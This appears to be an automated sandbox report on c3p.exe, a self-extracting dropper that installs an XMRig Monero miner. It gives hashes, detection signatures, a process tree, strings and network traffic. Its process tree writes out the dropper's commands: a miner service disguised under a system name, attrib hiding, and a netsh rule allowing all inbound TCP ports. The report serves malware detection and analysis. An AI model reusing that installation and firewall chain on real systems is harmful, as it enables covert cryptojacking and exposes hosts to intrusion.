Edit tour

Windows Analysis Report
c3p.exe

Overview

General Information

Sample name:	c3p.exe
Analysis ID:	1456175
MD5:	02aa02aee2a6bd93a4a8f4941a0e6310
SHA1:	03287a15bfd67ff8c3340c0bae425ecaa37a929f
SHA256:	01a976b80253450a09d0b89075f5fa923a3411265f7bc8f3413d059fd662aa83
Tags:	CoinMinerexeminer
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Found strings related to Crypto-Mining

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the windows firewall

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Suspect Svchost Activity

Sigma detected: System File Execution Location Anomaly

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

File is packed with WinRar

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Modifies existing windows services

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Conhost Spawned By Uncommon Parent Process

Sigma detected: Suspicious Process Start Locations

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

svchost.exe (PID: 5880 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

c3p.exe (PID: 4912 cmdline: "C:\Users\user\Desktop\c3p.exe" MD5: 02AA02AEE2A6BD93A4A8F4941A0E6310)

cmd.exe (PID: 7224 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 7276 cmdline: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe MD5: D9EC6F3A3B2AC7CD5EEF07BD86E3EFBC)

sc.exe (PID: 7292 cmdline: sc config "Networks2" DisplayName= "Networksrs2" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 7308 cmdline: sc description "Networks2" "Microsoft Windows Networks" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 7324 cmdline: sc start "Networks2" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

attrib.exe (PID: 7364 cmdline: attrib C:\Windows\debug\c3p +h +a MD5: 0E938DD280E83B1596EC6AA48729C2B0)

attrib.exe (PID: 7380 cmdline: attrib C:\Windows\debug\c3p\*.json +h +a +s +r MD5: 0E938DD280E83B1596EC6AA48729C2B0)

attrib.exe (PID: 7396 cmdline: attrib C:\Windows\debug\c3p\*.exe +h +a +s +r MD5: 0E938DD280E83B1596EC6AA48729C2B0)

netsh.exe (PID: 7412 cmdline: netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

svchost.exe (PID: 7340 cmdline: C:\WINDOWS\Debug\c3p\svchost.exe MD5: D9EC6F3A3B2AC7CD5EEF07BD86E3EFBC)

conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systems.exe (PID: 7504 cmdline: "C:\WINDOWS\Debug\c3p\systems.exe" MD5: E2FE87CC2C7DAB8CA6516620DCCD1381)

svchost.exe (PID: 7840 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\debug\c3p\systems.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\debug\c3p\systems.exe	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x1356d8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
C:\Windows\debug\c3p\systems.exe	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x612109:$a1: mining.set_target 0x603d4a:$a2: XMRIG_HOSTNAME 0x6069d8:$a3: Usage: xmrig [OPTIONS] 0x603d24:$a4: XMRIG_VERSION
C:\Windows\debug\c3p\systems.exe	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x65b8fe:$x1: donate.ssl.xmrig.com 0x65bdd9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x6ecf53:$s2: \\?\pipe\uv\%p-%lu
C:\Windows\debug\c3p\systems.exe	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x65cf88:$s1: %s/%s (Windows NT %lu.%lu 0x6616e8:$s3: \\.\WinRing0_ 0x608b02:$s4: pool_wallet 0x603170:$s5: cryptonight 0x60317e:$s5: cryptonight 0x60318d:$s5: cryptonight 0x60319b:$s5: cryptonight 0x6031b0:$s5: cryptonight 0x6031bf:$s5: cryptonight 0x6031cd:$s5: cryptonight 0x6031e2:$s5: cryptonight 0x6031f1:$s5: cryptonight 0x603202:$s5: cryptonight 0x603219:$s5: cryptonight 0x603227:$s5: cryptonight 0x603235:$s5: cryptonight 0x603245:$s5: cryptonight 0x603257:$s5: cryptonight 0x603268:$s5: cryptonight 0x603278:$s5: cryptonight 0x603288:$s5: cryptonight

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.2581832116.000001A465C15000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000F.00000002.2583101725.00007FF707684000.00000008.00000001.01000000.00000008.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000002.00000003.1341556755.0000000002A33000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000F.00000000.1358907279.00007FF707684000.00000008.00000001.01000000.00000008.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x10129:$a1: mining.set_target 0x1d6a:$a2: XMRIG_HOSTNAME 0x49f8:$a3: Usage: xmrig [OPTIONS] 0x1d44:$a4: XMRIG_VERSION
0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xfb09:$a1: mining.set_target 0x174a:$a2: XMRIG_HOSTNAME 0x43d8:$a3: Usage: xmrig [OPTIONS] 0x1724:$a4: XMRIG_VERSION
0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xfb09:$a1: mining.set_target 0x174a:$a2: XMRIG_HOSTNAME 0x43d8:$a3: Usage: xmrig [OPTIONS] 0x1724:$a4: XMRIG_VERSION
0000000F.00000000.1357815445.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x1346d8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
0000000F.00000002.2582096108.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x1346d8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
Process Memory Space: c3p.exe PID: 4912	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: c3p.exe PID: 4912	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4b279:$a1: mining.set_target 0x45a6a:$a2: XMRIG_HOSTNAME 0x480cf:$a3: Usage: xmrig [OPTIONS] 0x45a44:$a4: XMRIG_VERSION
Process Memory Space: systems.exe PID: 7504	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: systems.exe PID: 7504	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x29317:$a1: mining.set_target 0x23893:$a2: XMRIG_HOSTNAME 0x25ebc:$a3: Usage: xmrig [OPTIONS] 0x2386d:$a4: XMRIG_VERSION
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.0.systems.exe.7ff706b90000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
15.0.systems.exe.7ff706b90000.0.unpack	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x1356d8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
15.0.systems.exe.7ff706b90000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x612109:$a1: mining.set_target 0x603d4a:$a2: XMRIG_HOSTNAME 0x6069d8:$a3: Usage: xmrig [OPTIONS] 0x603d24:$a4: XMRIG_VERSION
15.0.systems.exe.7ff706b90000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x65b8fe:$x1: donate.ssl.xmrig.com 0x65bdd9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x6ecf53:$s2: \\?\pipe\uv\%p-%lu
15.0.systems.exe.7ff706b90000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x65cf88:$s1: %s/%s (Windows NT %lu.%lu 0x6616e8:$s3: \\.\WinRing0_ 0x608b02:$s4: pool_wallet 0x603170:$s5: cryptonight 0x60317e:$s5: cryptonight 0x60318d:$s5: cryptonight 0x60319b:$s5: cryptonight 0x6031b0:$s5: cryptonight 0x6031bf:$s5: cryptonight 0x6031cd:$s5: cryptonight 0x6031e2:$s5: cryptonight 0x6031f1:$s5: cryptonight 0x603202:$s5: cryptonight 0x603219:$s5: cryptonight 0x603227:$s5: cryptonight 0x603235:$s5: cryptonight 0x603245:$s5: cryptonight 0x603257:$s5: cryptonight 0x603268:$s5: cryptonight 0x603278:$s5: cryptonight 0x603288:$s5: cryptonight
15.2.systems.exe.7ff706b90000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
15.2.systems.exe.7ff706b90000.0.unpack	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x1356d8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
15.2.systems.exe.7ff706b90000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x612109:$a1: mining.set_target 0x603d4a:$a2: XMRIG_HOSTNAME 0x6069d8:$a3: Usage: xmrig [OPTIONS] 0x603d24:$a4: XMRIG_VERSION
15.2.systems.exe.7ff706b90000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x65b8fe:$x1: donate.ssl.xmrig.com 0x65bdd9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x6ecf53:$s2: \\?\pipe\uv\%p-%lu
15.2.systems.exe.7ff706b90000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x65cf88:$s1: %s/%s (Windows NT %lu.%lu 0x6616e8:$s3: \\.\WinRing0_ 0x608b02:$s4: pool_wallet 0x603170:$s5: cryptonight 0x60317e:$s5: cryptonight 0x60318d:$s5: cryptonight 0x60319b:$s5: cryptonight 0x6031b0:$s5: cryptonight 0x6031bf:$s5: cryptonight 0x6031cd:$s5: cryptonight 0x6031e2:$s5: cryptonight 0x6031f1:$s5: cryptonight 0x603202:$s5: cryptonight 0x603219:$s5: cryptonight 0x603227:$s5: cryptonight 0x603235:$s5: cryptonight 0x603245:$s5: cryptonight 0x603257:$s5: cryptonight 0x603268:$s5: cryptonight 0x603278:$s5: cryptonight 0x603288:$s5: cryptonight
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\debug\c3p\svchost.exe, NewProcessName: C:\Windows\debug\c3p\svchost.exe, OriginalFileName: C:\Windows\debug\c3p\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, ProcessId: 7276, ProcessName: svchost.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\c3p.exe, ProcessId: 4912, TargetFilename: C:\Windows\debug\c3p\svchost.exe

Sigma detected: Suspect Svchost Activity

Source: Process started

Author: David Burkett, @signalblur: Data: Command: C:\WINDOWS\Debug\c3p\svchost.exe, CommandLine: C:\WINDOWS\Debug\c3p\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\debug\c3p\svchost.exe, NewProcessName: C:\Windows\debug\c3p\svchost.exe, OriginalFileName: C:\Windows\debug\c3p\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe, ProcessId: 7340, ProcessName: svchost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\debug\c3p\svchost.exe, NewProcessName: C:\Windows\debug\c3p\svchost.exe, OriginalFileName: C:\Windows\debug\c3p\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, ProcessId: 7276, ProcessName: svchost.exe

Sigma detected: Conhost Spawned By Uncommon Parent Process

Source: Process started

Author: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe, ParentImage: C:\Windows\debug\c3p\svchost.exe, ParentProcessId: 7340, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 7460, ProcessName: conhost.exe

Sigma detected: Suspicious Process Start Locations

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\debug\c3p\svchost.exe, NewProcessName: C:\Windows\debug\c3p\svchost.exe, OriginalFileName: C:\Windows\debug\c3p\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, ProcessId: 7276, ProcessName: svchost.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\debug\c3p\svchost.exe, NewProcessName: C:\Windows\debug\c3p\svchost.exe, OriginalFileName: C:\Windows\debug\c3p\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, ProcessId: 7276, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 5880, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Windows\debug\c3p\systems.exe

Avira: detection malicious, Label: PUA/CoinMiner.bencb

Multi AV Scanner detection for dropped file

Source: C:\Windows\debug\c3p\systems.exe

ReversingLabs: Detection: 86%

Multi AV Scanner detection for submitted file

Source: c3p.exe

ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: C:\Windows\debug\c3p\systems.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: c3p.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2581832116.000001A465C15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2583101725.00007FF707684000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1341556755.0000000002A33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1358907279.00007FF707684000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: c3p.exe PID: 4912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: systems.exe PID: 7504, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\debug\c3p\systems.exe, type: DROPPED

Found strings related to Crypto-Mining

Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: c3p.exe, 00000002.00000003.1341556755.0000000002A33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: FileDescriptionXMRig miner.

Source: c3p.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: c3p.exe
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.dr

Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_004091FE FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		2_2_004091FE
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0040DB4F SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		2_2_0040DB4F

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: auto.c3pool.org

Source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 00000005.00000000.1347222716.0000000000426000.00000002.00000001.01000000.00000007.sdmp, svchost.exe, 00000009.00000000.1351325044.0000000000426000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.2.dr	String found in binary or memory: http://nssm.cc/h
Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.dr	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, systems.exe, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.dr	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: systems.exe, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.dr	String found in binary or memory: https://xmrig.com/wizard
Source: systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.dr	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
